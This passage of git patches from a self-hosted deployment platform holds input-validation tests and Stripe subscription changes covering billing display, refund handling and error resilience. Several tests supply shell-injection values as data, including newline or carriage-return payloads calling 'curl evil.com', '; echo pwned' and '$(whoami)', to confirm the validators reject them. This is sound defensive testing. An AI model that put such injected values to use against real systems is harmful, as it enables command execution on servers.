+            ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects double quotes in docker_compose_custom_start_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_start_command' => 'docker compose up -d --build "malicious"'],
+            ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects newline injection in docker_compose_custom_start_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_start_command' => "docker compose up\ncurl evil.com"],
+            ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects carriage return injection in docker_compose_custom_build_command', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['docker_compose_custom_build_command' => "docker compose build\rcurl evil.com"],
+            ['docker_compose_custom_build_command' => $rules['docker_compose_custom_build_command']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('runtime validates docker compose commands', function () {
+        $job = new ReflectionClass(ApplicationDeploymentJob::class);
+        $method = $job->getMethod('validateShellSafeCommand');
+        $method->setAccessible(true);
+
+        $instance = $job->newInstanceWithoutConstructor();
+
+        expect(fn () => $method->invoke($instance, 'docker compose up; echo pwned', 'docker_compose_custom_start_command'))
+            ->toThrow(RuntimeException::class, 'contains forbidden shell characters');
+
+        expect(fn () => $method->invoke($instance, "docker compose up\ncurl evil.com", 'docker_compose_custom_start_command'))
+            ->toThrow(RuntimeException::class, 'contains forbidden shell characters');
+
+        expect($method->invoke($instance, 'docker compose up -d --build', 'docker_compose_custom_start_command'))
+            ->toBe('docker compose up -d --build');
+    });
+});
+
+describe('custom_docker_run_options validation', function () {
+    test('rejects semicolon injection in custom_docker_run_options', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['custom_docker_run_options' => '--cap-add=NET_ADMIN; echo pwned'],
+            ['custom_docker_run_options' => $rules['custom_docker_run_options']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('rejects command substitution in custom_docker_run_options', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['custom_docker_run_options' => '--hostname=$(whoami)'],
+            ['custom_docker_run_options' => $rules['custom_docker_run_options']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('allows valid docker run options', function ($opts) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['custom_docker_run_options' => $opts],
+            ['custom_docker_run_options' => $rules['custom_docker_run_options']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with([
+        '--cap-add=NET_ADMIN --cap-add=NET_RAW',
+        '--privileged --init',
+        '--memory=512m --cpus=2',
+    ]);
+});
+
+describe('container name validation', function () {
+    test('rejects shell injection in container name', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['post_deployment_command_container' => 'my-container; echo pwned'],
+            ['post_deployment_command_container' => $rules['post_deployment_command_container']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    });
+
+    test('allows valid container names', function ($name) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['post_deployment_command_container' => $name],
+            ['post_deployment_command_container' => $rules['post_deployment_command_container']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with(['my-app', 'nginx_proxy', 'web.server', 'app123']);
+
+    test('runtime validates container names', function () {
+        $job = new ReflectionClass(ApplicationDeploymentJob::class);
+        $method = $job->getMethod('validateContainerName');
+        $method->setAccessible(true);
+
+        $instance = $job->newInstanceWithoutConstructor();
+
+        expect(fn () => $method->invoke($instance, 'container; echo pwned'))
+            ->toThrow(RuntimeException::class, 'contains forbidden characters');
+
+        expect($method->invoke($instance, 'my-app'))
+            ->toBe('my-app');
+    });
+});
+
+describe('dockerfile_target_build rules survive array_merge in controller', function () {
+    test('dockerfile_target_build safe regex is not overridden by local rules', function () {
+        $sharedRules = sharedDataApplications();
+
+        // Simulate what ApplicationsController does: array_merge(shared, local)
+        $localRules = [
+            'name' => 'string|max:255',
+            'docker_compose_domains' => 'array|nullable',
+        ];
+        $merged = array_merge($sharedRules, $localRules);
+
+        expect($merged)->toHaveKey('dockerfile_target_build');
+        expect($merged['dockerfile_target_build'])->toBeArray();
+        expect($merged['dockerfile_target_build'])->toContain('regex:'.\App\Support\ValidationPatterns::DOCKER_TARGET_PATTERN);
+    });
+});
+
+describe('docker_compose_custom_command rules survive array_merge in controller', function () {
+    test('docker_compose_custom_start_command safe regex is not overridden by local rules', function () {
+        $sharedRules = sharedDataApplications();
+
+        // Simulate what ApplicationsController does: array_merge(shared, local)
+        // After our fix, local no longer contains docker_compose_custom_start_command,
+        // so the shared regex rule must survive
+        $localRules = [
+            'name' => 'string|max:255',
+            'docker_compose_domains' => 'array|nullable',
+        ];
+        $merged = array_merge($sharedRules, $localRules);
+
+        expect($merged['docker_compose_custom_start_command'])->toBeArray();
+        expect($merged['docker_compose_custom_start_command'])->toContain('regex:'.\App\Support\ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+    });
+
+    test('docker_compose_custom_build_command safe regex is not overridden by local rules', function () {
+        $sharedRules = sharedDataApplications();
+
+        $localRules = [
+            'name' => 'string|max:255',
+            'docker_compose_domains' => 'array|nullable',
+        ];
+        $merged = array_merge($sharedRules, $localRules);
+
+        expect($merged['docker_compose_custom_build_command'])->toBeArray();
+        expect($merged['docker_compose_custom_build_command'])->toContain('regex:'.\App\Support\ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+    });
+});
+
 describe('API route middleware for deploy actions', function () {
     test('application start route requires deploy ability', function () {
         $routes = app('router')->getRoutes();

From 426a708374dc17cef700ba5b90070ce50758f46a Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 18 Mar 2026 15:11:19 +0100
Subject: [PATCH 085/213] feat(subscription): display next billing date and
 billing interval

Add current_period_end to refund eligibility checks and display next billing
date and billing interval in the subscription overview. Refactor the plan
overview layout to show subscription status more prominently.
---
 app/Actions/Stripe/RefundSubscription.php     |  14 +-
 app/Livewire/Subscription/Actions.php         |  10 ++
 jean.json                                     |  11 +-
 .../livewire/subscription/actions.blade.php   | 120 ++++++++++--------
 .../Subscription/RefundSubscriptionTest.php   |  15 +++
 5 files changed, 113 insertions(+), 57 deletions(-)

diff --git a/app/Actions/Stripe/RefundSubscription.php b/app/Actions/Stripe/RefundSubscription.php
index 021cba13e..512afdb9e 100644
--- a/app/Actions/Stripe/RefundSubscription.php
+++ b/app/Actions/Stripe/RefundSubscription.php
@@ -19,7 +19,7 @@ public function __construct(?StripeClient $stripe = null)
     /**
      * Check if the team's subscription is eligible for a refund.
      *
-     * @return array{eligible: bool, days_remaining: int, reason: string}
+     * @return array{eligible: bool, days_remaining: int, reason: string, current_period_end: int|null}
      */
     public function checkEligibility(Team $team): array
     {
@@ -43,8 +43,10 @@ public function checkEligibility(Team $team): array
             return $this->ineligible('Subscription not found in Stripe.');
         }
 
+        $currentPeriodEnd = $stripeSubscription->current_period_end;
+
         if (! in_array($stripeSubscription->status, ['active', 'trialing'])) {
-            return $this->ineligible("Subscription status is '{$stripeSubscription->status}'.");
+            return $this->ineligible("Subscription status is '{$stripeSubscription->status}'.", $currentPeriodEnd);
         }
 
         $startDate = \Carbon\Carbon::createFromTimestamp($stripeSubscription->start_date);
@@ -52,13 +54,14 @@ public function checkEligibility(Team $team): array
         $daysRemaining = self::REFUND_WINDOW_DAYS - $daysSinceStart;
 
         if ($daysRemaining <= 0) {
-            return $this->ineligible('The 30-day refund window has expired.');
+            return $this->ineligible('The 30-day refund window has expired.', $currentPeriodEnd);
         }
 
         return [
             'eligible' => true,
             'days_remaining' => $daysRemaining,
             'reason' => 'Eligible for refund.',
+            'current_period_end' => $currentPeriodEnd,
         ];
     }
 
@@ -128,14 +131,15 @@ public function execute(Team $team): array
     }
 
     /**
-     * @return array{eligible: bool, days_remaining: int, reason: string}
+     * @return array{eligible: bool, days_remaining: int, reason: string, current_period_end: int|null}
      */
-    private function ineligible(string $reason): array
+    private function ineligible(string $reason, ?int $currentPeriodEnd = null): array
     {
         return [
             'eligible' => false,
             'days_remaining' => 0,
             'reason' => $reason,
+            'current_period_end' => $currentPeriodEnd,
         ];
     }
 }
diff --git a/app/Livewire/Subscription/Actions.php b/app/Livewire/Subscription/Actions.php
index 2d5392240..33eed3a6a 100644
--- a/app/Livewire/Subscription/Actions.php
+++ b/app/Livewire/Subscription/Actions.php
@@ -7,6 +7,7 @@
 use App\Actions\Stripe\ResumeSubscription;
 use App\Actions\Stripe\UpdateSubscriptionQuantity;
 use App\Models\Team;
+use Carbon\Carbon;
 use Illuminate\Support\Facades\Hash;
 use Livewire\Component;
 use Stripe\StripeClient;
@@ -31,10 +32,15 @@ class Actions extends Component
 
     public bool $refundAlreadyUsed = false;
 
+    public string $billingInterval = 'monthly';
+
+    public ?string $nextBillingDate = null;
+
     public function mount(): void
     {
         $this->server_limits = Team::serverLimit();
         $this->quantity = (int) $this->server_limits;
+        $this->billingInterval = currentTeam()->subscription?->billingInterval() ?? 'monthly';
     }
 
     public function loadPricePreview(int $quantity): void
@@ -198,6 +204,10 @@ private function checkRefundEligibility(): void
             $result = (new RefundSubscription)->checkEligibility(currentTeam());
             $this->isRefundEligible = $result['eligible'];
             $this->refundDaysRemaining = $result['days_remaining'];
+
+            if ($result['current_period_end']) {
+                $this->nextBillingDate = Carbon::createFromTimestamp($result['current_period_end'])->format('M j, Y');
+            }
         } catch (\Exception $e) {
             \Log::warning('Refund eligibility check failed: '.$e->getMessage());
         }
diff --git a/jean.json b/jean.json
index 402bcd02d..5cd8362d9 100644
--- a/jean.json
+++ b/jean.json
@@ -1,6 +1,13 @@
 {
   "scripts": {
     "setup": "cp $JEAN_ROOT_PATH/.env . && mkdir -p .claude && cp $JEAN_ROOT_PATH/.claude/settings.local.json .claude/settings.local.json",
+    "teardown": null,
     "run": "docker rm -f coolify coolify-minio-init coolify-realtime coolify-minio coolify-testing-host coolify-redis coolify-db coolify-mail coolify-vite; spin up; spin down"
-  }
-}
\ No newline at end of file
+  },
+  "ports": [
+    {
+      "port": 8000,
+      "label": "Coolify UI"
+    }
+  ]
+}
diff --git a/resources/views/livewire/subscription/actions.blade.php b/resources/views/livewire/subscription/actions.blade.php
index c2bc7f221..6fba0ed83 100644
--- a/resources/views/livewire/subscription/actions.blade.php
+++ b/resources/views/livewire/subscription/actions.blade.php
@@ -35,44 +35,44 @@
         }" @success.window="preview = null; showModal = false; qty = $wire.server_limits"
             @keydown.escape.window="if (showModal) { closeAdjust(); }" class="-mt-2">
             <h3 class="pb-2">Plan Overview</h3>
-            <div class="grid grid-cols-1 gap-4 xl:grid-cols-3">
-                {{-- Current Plan Card --}}
-                <div class="p-5 rounded border dark:bg-coolgray-100 bg-white border-neutral-200 dark:border-coolgray-400">
-                    <div class="text-xs font-bold text-neutral-500 uppercase tracking-wide pb-1">Current Plan</div>
-                    <div class="text-xl font-bold dark:text-warning">
+            <div class="space-y-2">
+                <div class="text-sm">
+                    <span class="text-neutral-500">Plan:</span>
+                    <span class="dark:text-warning font-medium">
                         @if (data_get(currentTeam(), 'subscription')->type() == 'dynamic')
                             Pay-as-you-go
                         @else
                             {{ data_get(currentTeam(), 'subscription')->type() }}
                         @endif
-                    </div>
-                    <div class="pt-2 text-sm">
+                    </span>
+                    <span class="text-neutral-500">&middot; {{ $billingInterval === 'yearly' ? 'Yearly' : 'Monthly' }}</span>
+                    <span class="text-neutral-500">&middot;</span>
+                    @if (currentTeam()->subscription->stripe_cancel_at_period_end)
+                        <span class="text-red-500 font-medium">Cancelling at end of period</span>
+                    @else
+                        <span class="text-green-500 font-medium">Active</span>
+                    @endif
+                </div>
+                <div class="text-sm flex items-center gap-2 flex-wrap">
+                    <span>
+                        <span class="text-neutral-500">Active servers:</span>
+                        <span class="font-medium {{ currentTeam()->serverOverflow() ? 'text-red-500' : 'dark:text-white' }}">{{ currentTeam()->servers->count() }}</span>
+                        <span class="text-neutral-500">/</span>
+                        <span class="font-medium dark:text-white" x-text="current"></span>
+                        <span class="text-neutral-500">paid</span>
+                    </span>
+                    <x-forms.button isHighlighted @click="openAdjust()">Adjust</x-forms.button>
+                </div>
+                <div class="text-sm text-neutral-500">
+                    @if ($refundCheckLoading)
+                        <x-loading text="Loading..." />
+                    @elseif ($nextBillingDate)
                         @if (currentTeam()->subscription->stripe_cancel_at_period_end)
-                            <span class="text-red-500 font-medium">Cancelling at end of period</span>
+                            Cancels on <span class="dark:text-white font-medium">{{ $nextBillingDate }}</span>
                         @else
-                            <span class="text-green-500 font-medium">Active</span>
-                            <span class="text-neutral-500"> &middot; Invoice
-                                {{ currentTeam()->subscription->stripe_invoice_paid ? 'paid' : 'not paid' }}</span>
+                            Next billing <span class="dark:text-white font-medium">{{ $nextBillingDate }}</span>
                         @endif
-                    </div>
-                </div>
-
-                {{-- Paid Servers Card --}}
-                <div class="p-5 rounded border dark:bg-coolgray-100 bg-white border-neutral-200 dark:border-coolgray-400 cursor-pointer hover:border-warning/50 transition-colors"
-                    @click="openAdjust()">
-                    <div class="text-xs font-bold text-neutral-500 uppercase tracking-wide pb-1">Paid Servers</div>
-                    <div class="text-xl font-bold dark:text-white" x-text="current"></div>
-                    <div class="pt-2 text-sm text-neutral-500">Click to adjust</div>
-                </div>
-
-                {{-- Active Servers Card --}}
-                <div
-                    class="p-5 rounded border dark:bg-coolgray-100 bg-white border-neutral-200 dark:border-coolgray-400 {{ currentTeam()->serverOverflow() ? 'border-red-500 dark:border-red-500' : '' }}">
-                    <div class="text-xs font-bold text-neutral-500 uppercase tracking-wide pb-1">Active Servers</div>
-                    <div class="text-xl font-bold {{ currentTeam()->serverOverflow() ? 'text-red-500' : 'dark:text-white' }}">
-                        {{ currentTeam()->servers->count() }}
-                    </div>
-                    <div class="pt-2 text-sm text-neutral-500">Currently running</div>
+                    @endif
                 </div>
             </div>
 
@@ -99,9 +99,9 @@ class="fixed top-0 left-0 z-99 flex items-center justify-center w-screen h-scree
                         x-transition:leave-end="opacity-0 -translate-y-2 sm:scale-95"
                         class="relative w-full border rounded-sm min-w-full lg:min-w-[36rem] max-w-[48rem] max-h-[calc(100vh-2rem)] bg-neutral-100 border-neutral-400 dark:bg-base dark:border-coolgray-300 flex flex-col">
                         <div class="flex justify-between items-center py-6 px-7 shrink-0">
-                            <h3 class="pr-8 text-2xl font-bold">Adjust Server Limit</h3>
+                            <h3 class="text-2xl font-bold">Adjust Server Limit</h3>
                             <button @click="closeAdjust()"
-                                class="flex absolute top-2 right-2 justify-center items-center w-8 h-8 rounded-full dark:text-white hover:bg-coolgray-300">
+                                class="flex justify-center items-center w-8 h-8 rounded-full dark:text-white hover:bg-coolgray-300">
                                 <svg class="w-6 h-6" xmlns="http://www.w3.org/2000/svg" fill="none"
                                     viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor">
                                     <path stroke-linecap="round" stroke-linejoin="round" d="M6 18L18 6M6 6l12 12" />
@@ -144,7 +144,12 @@ class="w-20 px-2 py-1 text-xl font-bold text-center rounded border dark:bg-coolg
                                     <p class="text-xs text-neutral-500 pt-1">Charged immediately to your payment method.</p>
                                 </div>
                                 <div>
-                                    <div class="text-xs font-bold text-neutral-500 uppercase tracking-wide pb-1.5">Next billing cycle</div>
+                                    <div class="text-xs font-bold text-neutral-500 uppercase tracking-wide pb-1.5">
+                                        Next billing cycle
+                                        @if ($nextBillingDate)
+                                            <span class="normal-case font-normal">&middot; {{ $nextBillingDate }}</span>
+                                        @endif
+                                    </div>
                                     <div class="space-y-1.5">
                                         <div class="flex justify-between gap-6 text-sm">
                                             <span class="text-neutral-500" x-text="preview?.quantity + ' servers × ' + fmt(preview?.unit_price)"></span>
@@ -155,7 +160,7 @@ class="w-20 px-2 py-1 text-xl font-bold text-center rounded border dark:bg-coolg
                                             <span class="dark:text-white" x-text="fmt(preview?.recurring_tax)"></span>
                                         </div>
                                         <div class="flex justify-between gap-6 text-sm font-bold pt-1.5 border-t dark:border-coolgray-400 border-neutral-200">
-                                            <span class="dark:text-white">Total / month</span>
+                                            <span class="dark:text-white">Total / {{ $billingInterval === 'yearly' ? 'year' : 'month' }}</span>
                                             <span class="dark:text-white" x-text="fmt(preview?.recurring_total)"></span>
                                         </div>
                                     </div>
@@ -175,7 +180,7 @@ class="w-20 px-2 py-1 text-xl font-bold text-center rounded border dark:bg-coolg
                                     warningMessage="This will update your subscription and charge the prorated amount to your payment method."
                                     step2ButtonText="Confirm & Pay">
                                     <x-slot:content>
-                                        <x-forms.button @click="$wire.set('quantity', qty)">
+                                        <x-forms.button class="w-full" @click="$wire.set('quantity', qty)">
                                             Update Server Limit
                                         </x-forms.button>
                                     </x-slot:content>
@@ -194,11 +199,10 @@ class="w-20 px-2 py-1 text-xl font-bold text-center rounded border dark:bg-coolg
             </template>
         </section>
 
-        {{-- Billing, Refund & Cancellation --}}
+        {{-- Manage Subscription --}}
         <section>
             <h3 class="pb-2">Manage Subscription</h3>
             <div class="flex flex-wrap items-center gap-2">
-                {{-- Billing --}}
                 <x-forms.button class="gap-2" wire:click='stripeCustomerPortal'>
                     <svg xmlns="http://www.w3.org/2000/svg" class="w-4 h-4" fill="none" viewBox="0 0 24 24"
                         stroke-width="1.5" stroke="currentColor">
@@ -207,8 +211,13 @@ class="w-20 px-2 py-1 text-xl font-bold text-center rounded border dark:bg-coolg
                     </svg>
                     Manage Billing on Stripe
                 </x-forms.button>
+            </div>
+        </section>
 
-                {{-- Resume or Cancel --}}
+        {{-- Cancel Subscription --}}
+        <section>
+            <h3 class="pb-2">Cancel Subscription</h3>
+            <div class="flex flex-wrap items-center gap-2">
                 @if (currentTeam()->subscription->stripe_cancel_at_period_end)
                     <x-forms.button wire:click="resumeSubscription">Resume Subscription</x-forms.button>
                 @else
@@ -231,10 +240,18 @@ class="w-20 px-2 py-1 text-xl font-bold text-center rounded border dark:bg-coolg
                         confirmationLabel="Enter your team name to confirm"
                         shortConfirmationLabel="Team Name" step2ButtonText="Permanently Cancel" />
                 @endif
+            </div>
+            @if (currentTeam()->subscription->stripe_cancel_at_period_end)
+                <p class="mt-2 text-sm text-neutral-500">Your subscription is set to cancel at the end of the billing period.</p>
+            @endif
+        </section>
 
-                {{-- Refund --}}
+        {{-- Refund --}}
+        <section>
+            <h3 class="pb-2">Refund</h3>
+            <div class="flex flex-wrap items-center gap-2">
                 @if ($refundCheckLoading)
-                    <x-loading text="Checking refund..." />
+                    <x-forms.button disabled>Request Full Refund</x-forms.button>
                 @elseif ($isRefundEligible && !currentTeam()->subscription->stripe_cancel_at_period_end)
                     <x-modal-confirmation title="Request Full Refund?" buttonTitle="Request Full Refund"
                         isErrorButton submitAction="refundSubscription"
@@ -245,18 +262,21 @@ class="w-20 px-2 py-1 text-xl font-bold text-center rounded border dark:bg-coolg
                         ]" confirmationText="{{ currentTeam()->name }}"
                         confirmationLabel="Enter your team name to confirm" shortConfirmationLabel="Team Name"
                         step2ButtonText="Confirm Refund & Cancel" />
+                @else
+                    <x-forms.button disabled>Request Full Refund</x-forms.button>
                 @endif
             </div>
-
-            {{-- Contextual notes --}}
-            @if ($isRefundEligible && !currentTeam()->subscription->stripe_cancel_at_period_end)
-                <p class="mt-2 text-sm text-neutral-500">Eligible for a full refund &mdash; <strong class="dark:text-warning">{{ $refundDaysRemaining }}</strong> days remaining.</p>
-            @elseif ($refundAlreadyUsed)
-                <p class="mt-2 text-sm text-neutral-500">Refund already processed. Each team is eligible for one refund only.</p>
-            @endif
-            @if (currentTeam()->subscription->stripe_cancel_at_period_end)
-                <p class="mt-2 text-sm text-neutral-500">Your subscription is set to cancel at the end of the billing period.</p>
-            @endif
+            <p class="mt-2 text-sm text-neutral-500">
+                @if ($refundCheckLoading)
+                    Checking refund eligibility...
+                @elseif ($isRefundEligible && !currentTeam()->subscription->stripe_cancel_at_period_end)
+                    Eligible for a full refund &mdash; <strong class="dark:text-warning">{{ $refundDaysRemaining }}</strong> days remaining.
+                @elseif ($refundAlreadyUsed)
+                    Refund already processed. Each team is eligible for one refund only.
+                @else
+                    Not eligible for a refund.
+                @endif
+            </p>
         </section>
 
         <div class="text-sm text-neutral-500">
diff --git a/tests/Feature/Subscription/RefundSubscriptionTest.php b/tests/Feature/Subscription/RefundSubscriptionTest.php
index b6c2d4064..2447a0716 100644
--- a/tests/Feature/Subscription/RefundSubscriptionTest.php
+++ b/tests/Feature/Subscription/RefundSubscriptionTest.php
@@ -43,9 +43,11 @@
 
 describe('checkEligibility', function () {
     test('returns eligible when subscription is within 30 days', function () {
+        $periodEnd = now()->addDays(20)->timestamp;
         $stripeSubscription = (object) [
             'status' => 'active',
             'start_date' => now()->subDays(10)->timestamp,
+            'current_period_end' => $periodEnd,
         ];
 
         $this->mockSubscriptions
@@ -58,12 +60,15 @@
 
         expect($result['eligible'])->toBeTrue();
         expect($result['days_remaining'])->toBe(20);
+        expect($result['current_period_end'])->toBe($periodEnd);
     });
 
     test('returns ineligible when subscription is past 30 days', function () {
+        $periodEnd = now()->addDays(25)->timestamp;
         $stripeSubscription = (object) [
             'status' => 'active',
             'start_date' => now()->subDays(35)->timestamp,
+            'current_period_end' => $periodEnd,
         ];
 
         $this->mockSubscriptions
@@ -77,12 +82,15 @@
         expect($result['eligible'])->toBeFalse();
         expect($result['days_remaining'])->toBe(0);
         expect($result['reason'])->toContain('30-day refund window has expired');
+        expect($result['current_period_end'])->toBe($periodEnd);
     });
 
     test('returns ineligible when subscription is not active', function () {
+        $periodEnd = now()->addDays(25)->timestamp;
         $stripeSubscription = (object) [
             'status' => 'canceled',
             'start_date' => now()->subDays(5)->timestamp,
+            'current_period_end' => $periodEnd,
         ];
 
         $this->mockSubscriptions
@@ -94,6 +102,7 @@
         $result = $action->checkEligibility($this->team);
 
         expect($result['eligible'])->toBeFalse();
+        expect($result['current_period_end'])->toBe($periodEnd);
     });
 
     test('returns ineligible when no subscription exists', function () {
@@ -104,6 +113,7 @@
 
         expect($result['eligible'])->toBeFalse();
         expect($result['reason'])->toContain('No active subscription');
+        expect($result['current_period_end'])->toBeNull();
     });
 
     test('returns ineligible when invoice is not paid', function () {
@@ -114,6 +124,7 @@
 
         expect($result['eligible'])->toBeFalse();
         expect($result['reason'])->toContain('not paid');
+        expect($result['current_period_end'])->toBeNull();
     });
 
     test('returns ineligible when team has already been refunded', function () {
@@ -145,6 +156,7 @@
         $stripeSubscription = (object) [
             'status' => 'active',
             'start_date' => now()->subDays(10)->timestamp,
+            'current_period_end' => now()->addDays(20)->timestamp,
         ];
 
         $this->mockSubscriptions
@@ -205,6 +217,7 @@
         $stripeSubscription = (object) [
             'status' => 'active',
             'start_date' => now()->subDays(10)->timestamp,
+            'current_period_end' => now()->addDays(20)->timestamp,
         ];
 
         $this->mockSubscriptions
@@ -229,6 +242,7 @@
         $stripeSubscription = (object) [
             'status' => 'active',
             'start_date' => now()->subDays(10)->timestamp,
+            'current_period_end' => now()->addDays(20)->timestamp,
         ];
 
         $this->mockSubscriptions
@@ -255,6 +269,7 @@
         $stripeSubscription = (object) [
             'status' => 'active',
             'start_date' => now()->subDays(35)->timestamp,
+            'current_period_end' => now()->addDays(25)->timestamp,
         ];
 
         $this->mockSubscriptions

From 566744b2e036897fc8200dd3622ba097aff1bf6c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 18 Mar 2026 15:21:59 +0100
Subject: [PATCH 086/213] fix(stripe): add error handling and resilience to
 subscription operations

- Record refunds immediately before cancellation to prevent retry issues if cancel fails
- Wrap Stripe API calls in try-catch for refunds and quantity reverts with internal notifications
- Add null check in Team.subscriptionEnded() to prevent NPE when subscription doesn't exist
- Fix control flow bug in StripeProcessJob (add missing break statement)
- Cap dynamic server limit with MAX_SERVER_LIMIT in subscription updates
- Add comprehensive tests for refund failures, event handling, and null safety
---
 app/Actions/Stripe/RefundSubscription.php     |  19 ++-
 .../Stripe/UpdateSubscriptionQuantity.php     |  19 ++-
 app/Jobs/StripeProcessJob.php                 |   6 +-
 .../VerifyStripeSubscriptionStatusJob.php     |   9 +-
 app/Models/Team.php                           |   4 +
 .../Subscription/RefundSubscriptionTest.php   |  50 ++++++
 .../Subscription/StripeProcessJobTest.php     | 143 ++++++++++++++++++
 .../TeamSubscriptionEndedTest.php             |  16 ++
 .../VerifyStripeSubscriptionStatusJobTest.php | 102 +++++++++++++
 9 files changed, 350 insertions(+), 18 deletions(-)
 create mode 100644 tests/Feature/Subscription/StripeProcessJobTest.php
 create mode 100644 tests/Feature/Subscription/TeamSubscriptionEndedTest.php
 create mode 100644 tests/Feature/Subscription/VerifyStripeSubscriptionStatusJobTest.php

diff --git a/app/Actions/Stripe/RefundSubscription.php b/app/Actions/Stripe/RefundSubscription.php
index 021cba13e..fc8191f5b 100644
--- a/app/Actions/Stripe/RefundSubscription.php
+++ b/app/Actions/Stripe/RefundSubscription.php
@@ -99,16 +99,27 @@ public function execute(Team $team): array
                 'payment_intent' => $paymentIntentId,
             ]);
 
-            $this->stripe->subscriptions->cancel($subscription->stripe_subscription_id);
+            // Record refund immediately so it cannot be retried if cancel fails
+            $subscription->update([
+                'stripe_refunded_at' => now(),
+                'stripe_feedback' => 'Refund requested by user',
+                'stripe_comment' => 'Full refund processed within 30-day window at '.now()->toDateTimeString(),
+            ]);
+
+            try {
+                $this->stripe->subscriptions->cancel($subscription->stripe_subscription_id);
+            } catch (\Exception $e) {
+                \Log::critical("Refund succeeded but subscription cancel failed for team {$team->id}: ".$e->getMessage());
+                send_internal_notification(
+                    "CRITICAL: Refund succeeded but cancel failed for subscription {$subscription->stripe_subscription_id}, team {$team->id}. Manual intervention required."
+                );
+            }
 
             $subscription->update([
                 'stripe_cancel_at_period_end' => false,
                 'stripe_invoice_paid' => false,
                 'stripe_trial_already_ended' => false,
                 'stripe_past_due' => false,
-                'stripe_feedback' => 'Refund requested by user',
-                'stripe_comment' => 'Full refund processed within 30-day window at '.now()->toDateTimeString(),
-                'stripe_refunded_at' => now(),
             ]);
 
             $team->subscriptionEnded();
diff --git a/app/Actions/Stripe/UpdateSubscriptionQuantity.php b/app/Actions/Stripe/UpdateSubscriptionQuantity.php
index c181e988d..a3eab4dca 100644
--- a/app/Actions/Stripe/UpdateSubscriptionQuantity.php
+++ b/app/Actions/Stripe/UpdateSubscriptionQuantity.php
@@ -153,12 +153,19 @@ public function execute(Team $team, int $quantity): array
                 \Log::warning("Subscription {$subscription->stripe_subscription_id} quantity updated but invoice not paid (status: {$latestInvoice->status}) for team {$team->name}. Reverting to {$previousQuantity}.");
 
                 // Revert subscription quantity on Stripe
-                $this->stripe->subscriptions->update($subscription->stripe_subscription_id, [
-                    'items' => [
-                        ['id' => $item->id, 'quantity' => $previousQuantity],
-                    ],
-                    'proration_behavior' => 'none',
-                ]);
+                try {
+                    $this->stripe->subscriptions->update($subscription->stripe_subscription_id, [
+                        'items' => [
+                            ['id' => $item->id, 'quantity' => $previousQuantity],
+                        ],
+                        'proration_behavior' => 'none',
+                    ]);
+                } catch (\Exception $revertException) {
+                    \Log::critical("Failed to revert Stripe quantity for subscription {$subscription->stripe_subscription_id}, team {$team->id}. Stripe may have quantity {$quantity} but local is {$previousQuantity}. Error: ".$revertException->getMessage());
+                    send_internal_notification(
+                        "CRITICAL: Stripe quantity revert failed for subscription {$subscription->stripe_subscription_id}, team {$team->id}. Manual reconciliation required."
+                    );
+                }
 
                 // Void the unpaid invoice
                 if ($latestInvoice->id) {
diff --git a/app/Jobs/StripeProcessJob.php b/app/Jobs/StripeProcessJob.php
index e61ac81e4..f5d52f29c 100644
--- a/app/Jobs/StripeProcessJob.php
+++ b/app/Jobs/StripeProcessJob.php
@@ -2,6 +2,7 @@
 
 namespace App\Jobs;
 
+use App\Actions\Stripe\UpdateSubscriptionQuantity;
 use App\Models\Subscription;
 use App\Models\Team;
 use Illuminate\Contracts\Queue\ShouldBeEncrypted;
@@ -238,6 +239,7 @@ public function handle(): void
                             'stripe_invoice_paid' => false,
                         ]);
                     }
+                    break;
                 case 'customer.subscription.updated':
                     $teamId = data_get($data, 'metadata.team_id');
                     $userId = data_get($data, 'metadata.user_id');
@@ -272,14 +274,14 @@ public function handle(): void
                     $comment = data_get($data, 'cancellation_details.comment');
                     $lookup_key = data_get($data, 'items.data.0.price.lookup_key');
                     if (str($lookup_key)->contains('dynamic')) {
-                        $quantity = data_get($data, 'items.data.0.quantity', 2);
+                        $quantity = min((int) data_get($data, 'items.data.0.quantity', 2), UpdateSubscriptionQuantity::MAX_SERVER_LIMIT);
                         $team = data_get($subscription, 'team');
                         if ($team) {
                             $team->update([
                                 'custom_server_limit' => $quantity,
                             ]);
+                            ServerLimitCheckJob::dispatch($team);
                         }
-                        ServerLimitCheckJob::dispatch($team);
                     }
                     $subscription->update([
                         'stripe_feedback' => $feedback,
diff --git a/app/Jobs/VerifyStripeSubscriptionStatusJob.php b/app/Jobs/VerifyStripeSubscriptionStatusJob.php
index cf7c3c0ea..f7addacf1 100644
--- a/app/Jobs/VerifyStripeSubscriptionStatusJob.php
+++ b/app/Jobs/VerifyStripeSubscriptionStatusJob.php
@@ -82,12 +82,9 @@ public function handle(): void
                         'stripe_past_due' => false,
                     ]);
 
-                    // Trigger subscription ended logic if canceled
-                    if ($stripeSubscription->status === 'canceled') {
-                        $team = $this->subscription->team;
-                        if ($team) {
-                            $team->subscriptionEnded();
-                        }
+                    $team = $this->subscription->team;
+                    if ($team) {
+                        $team->subscriptionEnded();
                     }
                     break;
 
